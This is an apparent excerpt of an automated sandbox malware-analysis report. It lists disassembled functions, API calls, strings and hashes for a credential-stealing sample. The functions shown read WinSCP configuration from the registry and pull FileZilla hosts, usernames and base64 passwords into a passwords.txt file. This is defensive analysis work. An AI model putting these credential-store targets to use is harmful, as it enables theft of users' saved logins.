                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                • Opcode ID: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                • Instruction ID: b80074a2059a1f3756ce7d307e25dbd51f94fcbc115dd2ec99a1d9f33b013242
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66D0A7F17012106BD6206764BC4DBC7395C9F05760F440021F981C62A0C27448C1C695
                                                                                                                                                                                                                                                                                Function 00410BA0 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                • Opcode ID: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                • Instruction ID: 2046fac39060b3b77728db7903071d1a84601050c9d96548d090f17622b8ad63
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AD0237160012097C7002B18FD4D98737545FC1708F010111F745B7151D135996E87DF
                                                                                                                                                                                                                                                                                Function 0040D080 Relevance: 149.5, APIs: 82, Strings: 3, Instructions: 788memorystringregistryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                • strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                • strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D44B
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D457
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,77735E70), ref: 0040D461
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040D468
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D47B
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D485
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040D4B6
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D50C
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D5C3
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040D5D4
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D5E9
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040D5F3
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D602
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D60A
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040D65C
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
                                                                                                                                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                                • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                                • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$Process$Free$??3@Allocstrcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$CloseOpenValue
                                                                                                                                                                                                                                                                                • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword
                                                                                                                                                                                                                                                                                • API String ID: 1968195974-1988659312
                                                                                                                                                                                                                                                                                • Opcode ID: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                                • Instruction ID: 45027c83fb9c17c7e498a7fe32e666c7a7efeb05010239fc81dc07cf04dd4ddd
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A342C9B19043005BD710ABA5CD49B6FBBE9EF85314F04082EF986A72D1D778DC49CB9A
                                                                                                                                                                                                                                                                                Function 0040DE80 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 430stringmemoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 1386 40de80-40df0b call 4101c0 call 411550 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410200 call 4076b0 1409 40df11-40df1e call 4115b0 1386->1409 1410 40e064-40e095 call 410230 * 5 1386->1410 1409->1410 1415 40df24-40df86 strtok_s call 4101c0 * 4 GetProcessHeap HeapAlloc 1409->1415 1432 40e0b9-40e0c7 StrStrA 1415->1432 1433 40df8c-40e05f lstrlenA call 4101c0 call 410200 * 4 call 413e50 call 410230 call 4104e0 * 4 call 410230 * 4 1415->1433 1434 40e0f0-40e0fe StrStrA 1432->1434 1435 40e0c9-40e0eb lstrlenA call 411e60 call 410290 call 410230 1432->1435 1433->1410 1438 40e100-40e122 lstrlenA call 411e60 call 410290 call 410230 1434->1438 1439 40e127-40e135 StrStrA 1434->1439 1435->1434 1438->1439 1441 40e137-40e159 lstrlenA call 411e60 call 410290 call 410230 1439->1441 1442 40e15e-40e16c StrStrA 1439->1442 1441->1442 1450 40e172-40e1dc lstrlenA call 411e60 call 410290 call 410230 call 410530 lstrlenA LocalAlloc 1442->1450 1451 40e2df-40e2f3 call 410530 lstrlenA 1442->1451 1450->1451 1486 40e1e2-40e1e7 1450->1486 1464 40e0a0-40e0b3 strtok_s 1451->1464 1465 40e2f9-40e30d call 410530 lstrlenA 1451->1465 1464->1432 1464->1433 1465->1464 1478 40e313-40e327 call 410530 lstrlenA 1465->1478 1478->1464 1487 40e32d-40e341 call 410530 lstrlenA 1478->1487 1489 40e2b0-40e2dc call 410240 call 410340 call 410290 call 410230 1486->1489 1490 40e1ed-40e200 1486->1490 1487->1464 1499 40e347-40e436 lstrcatA * 2 call 410530 lstrcatA * 2 call 410530 lstrcatA * 3 call 410530 lstrcatA * 3 call 410530 lstrcatA * 3 call 410240 * 4 1487->1499 1489->1451 1494 40e234-40e23b 1490->1494 1498 40e240-40e244 1494->1498 1502 40e270-40e273 1498->1502 1503 40e246-40e24a 1498->1503 1499->1464 1506 40e291-40e299 1502->1506 1508 40e280-40e283 1503->1508 1509 40e24c-40e250 1503->1509 1512 40e210-40e224 1506->1512 1513 40e29f-40e2a2 1506->1513 1508->1506 1515 40e290 1509->1515 1516 40e252-40e255 1509->1516 1520 40e22a-40e22e 1512->1520 1513->1520 1515->1506 1516->1506 1522 40e257-40e25d 1516->1522 1520->1489 1520->1494 1522->1498 1526 40e25f 1522->1526 1526->1520
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(0042150A,0042150A,0042150A,0042150A,?,00000028,0042150A), ref: 0040DF71
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0040DF7F
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 0040DF99
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E0BF
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E0CA
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E0F6
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E101
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E12D
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E138
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E164
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040E173
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E1D1
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrlen$lstrcpy$AllocLocal$File$CreateHeaplstrcat$CloseFolderFreeHandleObjectPathProcessReadSingleSizeSleepThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                • API String ID: 146520747-935134978
                                                                                                                                                                                                                                                                                • Opcode ID: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                                • Instruction ID: 0a1636bca5df7c154e2ca60be6e54f7e11655359c512dbb65eed7aa386b826a3
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E1C731A00218ABCB14EBB1DC959EE7B79AF58304F40045EF50277192DF7CA9C6CBA9
                                                                                                                                                                                                                                                                                Function 00403090 Relevance: 72.4, APIs: 27, Strings: 14, Instructions: 682networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
